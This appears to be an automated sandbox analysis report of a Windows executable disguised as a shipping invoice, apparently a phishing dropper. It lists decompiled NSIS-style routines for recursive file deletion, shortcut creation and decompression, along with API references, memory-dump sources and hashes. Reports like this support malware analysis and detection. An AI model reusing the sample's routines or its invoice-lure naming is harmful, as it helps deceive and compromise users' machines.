                                                                                                                                    • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 004047F9
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 0040480B
                                                                                                                                      • Part of subcall function 00405866: GetDlgItemTextA.USER32 ref: 00405879
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00406428
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406435
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040643A
                                                                                                                                      • Part of subcall function 004063D0: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040644A
                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429868,?,?,0000040F,?,00429868,00429868,?,00000001,00429868,?,?,000003FB,?), ref: 004048C9
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048E4
                                                                                                                                      • Part of subcall function 00404A3D: lstrlenA.KERNEL32(0042A898,0042A898,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404958,000000DF,00000000,00000400,?), ref: 00404ADB
                                                                                                                                      • Part of subcall function 00404A3D: wsprintfA.USER32 ref: 00404AE3
                                                                                                                                      • Part of subcall function 00404A3D: SetDlgItemTextA.USER32 ref: 00404AF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent
                                                                                                                                    • API String ID: 2624150263-3943753584
                                                                                                                                    • Opcode ID: d38bf3420d21e256bd621a43167c3cd3246753b5e2f5eb5a84e4bcdf7102eb19
                                                                                                                                    • Instruction ID: 6c8ebc684f0cc4dcb687aa888a93160b118c07d9326b545430e1aa4709eeee8b
                                                                                                                                    • Opcode Fuzzy Hash: d38bf3420d21e256bd621a43167c3cd3246753b5e2f5eb5a84e4bcdf7102eb19
                                                                                                                                    • Instruction Fuzzy Hash: 13A181F1900209ABDB11AFA6CD45AAF77B8EF84314F14843BF601B62D1DB7C99418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E0040592E(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				void* _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                    				signed int _t40;
                                                                                                                                    				char* _t53;
                                                                                                                                    				signed int _t55;
                                                                                                                                    				signed int _t58;
                                                                                                                                    				signed int _t64;
                                                                                                                                    				signed int _t66;
                                                                                                                                    				void* _t68;
                                                                                                                                    				signed char _t69;
                                                                                                                                    				CHAR* _t71;
                                                                                                                                    				void* _t72;
                                                                                                                                    				CHAR* _t73;
                                                                                                                                    				char* _t76;
                                                                                                                                    
                                                                                                                                    				_t69 = _a8;
                                                                                                                                    				_t73 = _a4;
                                                                                                                                    				_v8 = _t69 & 0x00000004;
                                                                                                                                    				_t40 = E00405BEC(__eflags, _t73);
                                                                                                                                    				_v16 = _t40;
                                                                                                                                    				if((_t69 & 0x00000008) != 0) {
                                                                                                                                    					_t66 = DeleteFileA(_t73);
                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                    					_t68 =  ~_t66 + 1;
                                                                                                                                    					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                                                                                                    					return _t68;
                                                                                                                                    				}
                                                                                                                                    				_a4 = _t69;
                                                                                                                                    				_t8 =  &_a4;
                                                                                                                                    				 *_t8 = _a4 & 0x00000001;
                                                                                                                                    				__eflags =  *_t8;
                                                                                                                                    				if( *_t8 == 0) {
                                                                                                                                    					L5:
                                                                                                                                    					E00406166(0x42b8a0, _t73);
                                                                                                                                    					__eflags = _a4;
                                                                                                                                    					if(_a4 == 0) {
                                                                                                                                    						E00405B45(_t73);
                                                                                                                                    					} else {
                                                                                                                                    						lstrcatA(0x42b8a0, "\*.*");
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *_t73;
                                                                                                                                    					if( *_t73 != 0) {
                                                                                                                                    						L10:
                                                                                                                                    						lstrcatA(_t73, 0x40a014);
                                                                                                                                    						L11:
                                                                                                                                    						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                                                                    						_t40 = FindFirstFileA(0x42b8a0,  &_v336);
                                                                                                                                    						__eflags = _t40 - 0xffffffff;
                                                                                                                                    						_v12 = _t40;
                                                                                                                                    						if(_t40 == 0xffffffff) {
                                                                                                                                    							L29:
                                                                                                                                    							__eflags = _a4;
                                                                                                                                    							if(_a4 != 0) {
                                                                                                                                    								_t32 = _t71 - 1;
                                                                                                                                    								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                                    								__eflags =  *_t32;
                                                                                                                                    							}
                                                                                                                                    							goto L31;
                                                                                                                                    						} else {
                                                                                                                                    							goto L12;
                                                                                                                                    						}
                                                                                                                                    						do {
                                                                                                                                    							L12:
                                                                                                                                    							_t76 =  &(_v336.cFileName);
                                                                                                                                    							_t53 = E00405B29( &(_v336.cFileName), 0x3f);
                                                                                                                                    							__eflags =  *_t53;
                                                                                                                                    							if( *_t53 != 0) {
                                                                                                                                    								__eflags = _v336.cAlternateFileName;
                                                                                                                                    								if(_v336.cAlternateFileName != 0) {
                                                                                                                                    									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *_t76 - 0x2e;
                                                                                                                                    							if( *_t76 != 0x2e) {
                                                                                                                                    								L19:
                                                                                                                                    								E00406166(_t71, _t76);
                                                                                                                                    								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                    									_t55 = E004058E6(__eflags, _t73, _v8);
                                                                                                                                    									__eflags = _t55;
                                                                                                                                    									if(_t55 != 0) {
                                                                                                                                    										E0040528D(0xfffffff2, _t73);
                                                                                                                                    									} else {
                                                                                                                                    										__eflags = _v8 - _t55;
                                                                                                                                    										if(_v8 == _t55) {
                                                                                                                                    											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                                                                                    										} else {
                                                                                                                                    											E0040528D(0xfffffff1, _t73);
                                                                                                                                    											E00405F45(_t72, _t73, 0);
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										E0040592E(__eflags, _t73, _a8);
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L27;
                                                                                                                                    							}
                                                                                                                                    							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                                                    							__eflags = _t64;
                                                                                                                                    							if(_t64 == 0) {
                                                                                                                                    								goto L27;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t64 - 0x2e;
                                                                                                                                    							if(_t64 != 0x2e) {
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    							__eflags =  *((char*)(_t76 + 2));
                                                                                                                                    							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                                                    								goto L27;
                                                                                                                                    							}
                                                                                                                                    							goto L19;
                                                                                                                                    							L27:
                                                                                                                                    							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                                                                    							__eflags = _t58;
                                                                                                                                    						} while (_t58 != 0);
                                                                                                                                    						_t40 = FindClose(_v12);
                                                                                                                                    						goto L29;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *0x42b8a0 - 0x5c;
                                                                                                                                    					if( *0x42b8a0 != 0x5c) {
                                                                                                                                    						goto L11;
                                                                                                                                    					}
                                                                                                                                    					goto L10;
                                                                                                                                    				} else {
                                                                                                                                    					__eflags = _t40;
                                                                                                                                    					if(_t40 == 0) {
                                                                                                                                    						L31:
                                                                                                                                    						__eflags = _a4;
                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                    							L39:
                                                                                                                                    							return _t40;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _v16;
                                                                                                                                    						if(_v16 != 0) {
                                                                                                                                    							_t40 = E00406469(_t73);
                                                                                                                                    							__eflags = _t40;
                                                                                                                                    							if(_t40 == 0) {
                                                                                                                                    								goto L39;
                                                                                                                                    							}
                                                                                                                                    							E00405AFE(_t73);
                                                                                                                                    							_t40 = E004058E6(__eflags, _t73, _v8 | 0x00000001);
                                                                                                                                    							__eflags = _t40;
                                                                                                                                    							if(_t40 != 0) {
                                                                                                                                    								return E0040528D(0xffffffe5, _t73);
                                                                                                                                    							}
                                                                                                                                    							__eflags = _v8;
                                                                                                                                    							if(_v8 == 0) {
                                                                                                                                    								goto L33;
                                                                                                                                    							}
                                                                                                                                    							E0040528D(0xfffffff1, _t73);
                                                                                                                                    							return E00405F45(_t72, _t73, 0);
                                                                                                                                    						}
                                                                                                                                    						L33:
                                                                                                                                    						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                                                                                                    						return _t40;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t69 & 0x00000002;
                                                                                                                                    					if((_t69 & 0x00000002) == 0) {
                                                                                                                                    						goto L31;
                                                                                                                                    					}
                                                                                                                                    					goto L5;
                                                                                                                                    				}
                                                                                                                                    			}




















                                                                                                                                    APIs
                                                                                                                                    • DeleteFileA.KERNEL32(?,?,73BCFA90,73BCF560,00000000), ref: 00405957
                                                                                                                                    • lstrcatA.KERNEL32(0042B8A0,\*.*,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 0040599F
                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059C0
                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059C6
                                                                                                                                    • FindFirstFileA.KERNEL32(0042B8A0,?,?,?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059D7
                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A84
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A95
                                                                                                                                    Strings
                                                                                                                                    • \*.*, xrefs: 00405999
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 0040592E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $\*.*
                                                                                                                                    • API String ID: 2035342205-3600554274
                                                                                                                                    • Opcode ID: c96ec4be521e5d7df77d453e54af7214f002a37f78003e62dcfa7a5afb28e376
                                                                                                                                    • Instruction ID: 61471d95c0fd6fe071b402e198ed6c61b6b8f1e7f927aa751433fda80e9bf68b
                                                                                                                                    • Opcode Fuzzy Hash: c96ec4be521e5d7df77d453e54af7214f002a37f78003e62dcfa7a5afb28e376
                                                                                                                                    • Instruction Fuzzy Hash: A051B130A00A04AADF21AB658C85FBF7B78DF52314F14427BF841B51D2D77C4946DEAA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                    			E00402138(void* __eflags) {
                                                                                                                                    				signed int _t55;
                                                                                                                                    				void* _t59;
                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                    				intOrPtr _t64;
                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                    				intOrPtr* _t75;
                                                                                                                                    				intOrPtr* _t78;
                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                    				int _t87;
                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                    				signed int _t105;
                                                                                                                                    				signed int _t109;
                                                                                                                                    				void* _t111;
                                                                                                                                    
                                                                                                                                    				 *(_t111 - 0x10) = E00402B2C(0xfffffff0);
                                                                                                                                    				 *(_t111 - 0xc) = E00402B2C(0xffffffdf);
                                                                                                                                    				 *((intOrPtr*)(_t111 - 0x44)) = E00402B2C(2);
                                                                                                                                    				 *((intOrPtr*)(_t111 - 0x40)) = E00402B2C(0xffffffcd);
                                                                                                                                    				 *((intOrPtr*)(_t111 - 0x4c)) = E00402B2C(0x45);
                                                                                                                                    				_t55 =  *(_t111 - 0x24);
                                                                                                                                    				 *(_t111 - 0x88) = _t55 & 0x00000fff;
                                                                                                                                    				_t105 = _t55 & 0x00008000;
                                                                                                                                    				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                                    				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                                    				if(E00405B6B( *(_t111 - 0xc)) == 0) {
                                                                                                                                    					E00402B2C(0x21);
                                                                                                                                    				}
                                                                                                                                    				_t59 = _t111 + 8;
                                                                                                                                    				__imp__CoCreateInstance(0x40851c, _t87, 1, 0x40850c, _t59);
                                                                                                                                    				if(_t59 < _t87) {
                                                                                                                                    					L15:
                                                                                                                                    					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                                    					_push(0xfffffff0);
                                                                                                                                    				} else {
                                                                                                                                    					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x40852c, _t111 - 0x1c);
                                                                                                                                    					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                                    					if(_t64 >= _t87) {
                                                                                                                                    						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                                    						if(_t105 == _t87) {
                                                                                                                                    							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                                                                                    						}
                                                                                                                                    						if(_t109 != _t87) {
                                                                                                                                    							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                                    						}
                                                                                                                                    						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
                                                                                                                                    						_t95 =  *((intOrPtr*)(_t111 - 0x40));
                                                                                                                                    						if( *_t95 != _t87) {
                                                                                                                                    							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
                                                                                                                                    						}
                                                                                                                                    						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x44)));
                                                                                                                                    						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x4c)));
                                                                                                                                    						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                    							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                                    							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x10), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                                    								_t78 =  *((intOrPtr*)(_t111 - 0x1c));
                                                                                                                                    								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t75 =  *((intOrPtr*)(_t111 - 0x1c));
                                                                                                                                    						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                    					}
                                                                                                                                    					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                    					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                    					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                    						_push(0xfffffff4);
                                                                                                                                    					} else {
                                                                                                                                    						goto L15;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				E00401423();
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 004021FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                    • API String ID: 123533781-47812868
                                                                                                                                    • Opcode ID: 074aa74a633204b349dfaef429f1ea974b099983f4015dcd1ad602f9d2c28e45
                                                                                                                                    • Instruction ID: c9eb5a0285b6c18ff98b66adf5edf6554836ffee9497b9f5b4e2a9baf3a30135
                                                                                                                                    • Opcode Fuzzy Hash: 074aa74a633204b349dfaef429f1ea974b099983f4015dcd1ad602f9d2c28e45
                                                                                                                                    • Instruction Fuzzy Hash: DD510671A00209AFCB04DFE4C988A9DBBB5FF48314F2085BAF915EB2D1DB799941CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E00402765(char __ebx, char* __edi, char* __esi) {
                                                                                                                                    				void* _t19;
                                                                                                                                    
                                                                                                                                    				if(FindFirstFileA(E00402B2C(2), _t19 - 0x1c8) != 0xffffffff) {
                                                                                                                                    					E004060C4(__edi, _t6);
                                                                                                                                    					_push(_t19 - 0x19c);
                                                                                                                                    					_push(__esi);
                                                                                                                                    					E00406166();
                                                                                                                                    				} else {
                                                                                                                                    					 *__edi = __ebx;
                                                                                                                                    					 *__esi = __ebx;
                                                                                                                                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                    				}
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                    • Opcode ID: 5dfb7db3aa25f5f4eb8cb2b3012c23c56794740afcaac6fc94cd1099ea738032
                                                                                                                                    • Instruction ID: 424f2c6ddb1572e7c5ce02535b77565719a00b3c54d6262f0fbb9de2ffc42380
                                                                                                                                    • Opcode Fuzzy Hash: 5dfb7db3aa25f5f4eb8cb2b3012c23c56794740afcaac6fc94cd1099ea738032
                                                                                                                                    • Instruction Fuzzy Hash: EDF0E5726441009BD301EBB49A49AFEB77CAF21324FA0017BE241F31C1D6F88949D76A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E00406943(signed int __ebx, signed int* __esi) {
                                                                                                                                    				signed int _t396;
                                                                                                                                    				signed int _t425;
                                                                                                                                    				signed int _t442;
                                                                                                                                    				signed int _t443;
                                                                                                                                    				signed int* _t446;
                                                                                                                                    				void* _t448;
                                                                                                                                    
                                                                                                                                    				L0:
                                                                                                                                    				while(1) {
                                                                                                                                    					L0:
                                                                                                                                    					_t446 = __esi;
                                                                                                                                    					_t425 = __ebx;
                                                                                                                                    					if( *(_t448 - 0x34) == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					L55:
                                                                                                                                    					__eax =  *(__ebp - 0x38);
                                                                                                                                    					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    					__ecx = __ebx;
                                                                                                                                    					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    					__ebx = __ebx + 8;
                                                                                                                                    					while(1) {
                                                                                                                                    						L56:
                                                                                                                                    						if(__ebx < 0xe) {
                                                                                                                                    							goto L0;
                                                                                                                                    						}
                                                                                                                                    						L57:
                                                                                                                                    						__eax =  *(__ebp - 0x40);
                                                                                                                                    						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                                    						__ecx = __eax;
                                                                                                                                    						__esi[1] = __eax;
                                                                                                                                    						__ecx = __eax & 0x0000001f;
                                                                                                                                    						if(__cl > 0x1d) {
                                                                                                                                    							L9:
                                                                                                                                    							_t443 = _t442 | 0xffffffff;
                                                                                                                                    							 *_t446 = 0x11;
                                                                                                                                    							L10:
                                                                                                                                    							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                    							_t446[0x146] = _t425;
                                                                                                                                    							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                                    							L11:
                                                                                                                                    							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                                    							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                                    							E004070B2( *(_t448 + 8));
                                                                                                                                    							return _t443;
                                                                                                                                    						}
                                                                                                                                    						L58:
                                                                                                                                    						__eax = __eax & 0x000003e0;
                                                                                                                                    						if(__eax > 0x3a0) {
                                                                                                                                    							goto L9;
                                                                                                                                    						}
                                                                                                                                    						L59:
                                                                                                                                    						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                                    						__ebx = __ebx - 0xe;
                                                                                                                                    						_t94 =  &(__esi[2]);
                                                                                                                                    						 *_t94 = __esi[2] & 0x00000000;
                                                                                                                                    						 *__esi = 0xc;
                                                                                                                                    						while(1) {
                                                                                                                                    							L60:
                                                                                                                                    							__esi[1] = __esi[1] >> 0xa;
                                                                                                                                    							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                    							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                    								goto L68;
                                                                                                                                    							}
                                                                                                                                    							L61:
                                                                                                                                    							while(1) {
                                                                                                                                    								L64:
                                                                                                                                    								if(__ebx >= 3) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								L62:
                                                                                                                                    								if( *(__ebp - 0x34) == 0) {
                                                                                                                                    									goto L182;
                                                                                                                                    								}
                                                                                                                                    								L63:
                                                                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                                                                    								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                    								__ecx = __ebx;
                                                                                                                                    								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                    								__ebx = __ebx + 8;
                                                                                                                                    							}
                                                                                                                                    							L65:
                                                                                                                                    							__ecx = __esi[2];
                                                                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                    							__ebx = __ebx - 3;
                                                                                                                                    							_t108 = __ecx + 0x408400; // 0x121110
                                                                                                                                    							__ecx =  *_t108;
                                                                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                                    							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                    							__ecx = __esi[1];
                                                                                                                                    							__esi[2] = __esi[2] + 1;
                                                                                                                                    							__eax = __esi[2];
                                                                                                                                    							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                                    							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                                    								goto L64;
                                                                                                                                    							}
                                                                                                                                    							L66:
                                                                                                                                    							while(1) {
                                                                                                                                    								L68:
                                                                                                                                    								if(__esi[2] >= 0x13) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								L67:
                                                                                                                                    								_t119 = __esi[2] + 0x408400; // 0x4000300
                                                                                                                                    								__eax =  *_t119;
                                                                                                                                    								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                                    								_t126 =  &(__esi[2]);
                                                                                                                                    								 *_t126 = __esi[2] + 1;
                                                                                                                                    							}
